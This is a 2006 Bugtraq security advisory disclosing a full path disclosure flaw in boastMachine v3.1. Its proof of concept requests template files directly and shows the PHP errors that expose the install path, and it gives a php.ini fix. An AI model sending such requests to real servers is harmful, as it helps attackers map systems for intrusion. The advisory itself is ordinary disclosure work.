[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060105102723.2334.qmail@securityfocus.com>
Date: 5 Jan 2006 10:27:23 -0000
From: eufrato@...il.com
To: bugtraq@...urityfocus.com
Subject: [ECHO_ADV_25$2006] Full path disclosure on boastMachine v3.1
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_25$2006
---------------------------------------------------------------------------
[ECHO_ADV_25$2006] Full path disclosure on boastMachine v3.1
---------------------------------------------------------------------------
Author : M.Hasran Addahroni
Date : January, 5th 2006
Location : Indonesia
Web : http://echo.or.id/adv/adv26-K-159-2006.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
BoastMachine
version : v3.1
Vendor : http://boastology.com
Description: boastMachine is an aplication software to built blog, support
with mysql and php
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
In the folder /templates/default/ A remote user can access footer.php and side_menu.php directly to cause the system to display an error message that indicates the installation path. The resulting error message will disclose potentially sensitive installation path information to the remote attacker
Proof of Concept:
~~~~~~~~
(i) http://victim/[boastMachine_path]/templates/default/side_menu.php
http://localhost/blog/templates/default/side_menu.php
Warning: Failed opening 'CFG_ROOT/calendar.php' for inclusion (include_path='.:/usr/lib/php') in
/var/www/html/blog/templates/default/side_menu.php on line 3
Fatal error: Call to undefined function: bmc_show_list() in
/var/www/html/blog/templates/default/side_menu.php on line 10
(ii) http://victim/[boastMachine_path]/templates/default/footer.php
http://localhost/blog/templates/default/footer.php
Warning: Failed opening 'CFG_ROOT/reflog.php' for inclusion (include_path='.:/usr/lib/php') in
/var/www/html/blog/templates/default/footer.php on line 20
Warning: Failed opening 'CFG_ROOT/users_online.php' for inclusion (include_path='.:/usr/lib/php') in
/var/www/html/blog/templates/default/footer.php on line 23
Solution:
~~~~~~~~~
For User and do not know how to fix the script , change php.ini file setting then turn on log_errors , and turn off display_error
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ y3dips, moby, comex, z3r0byt3, the_day, c-a-s-e, S`to, lirva32, anonymous
~ masterpop3, biatch-x, bithedz, Lieur-Euy, mr_Ny3m, maSter-oP, stev, sinChan, cowok_1seng, x`shell, m_beben, etc
~ newbie_hacker@...oogroups.com
~ #e-c-h-o, #aikmel @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~
K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://k-159.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
Powered by blists - more mailing lists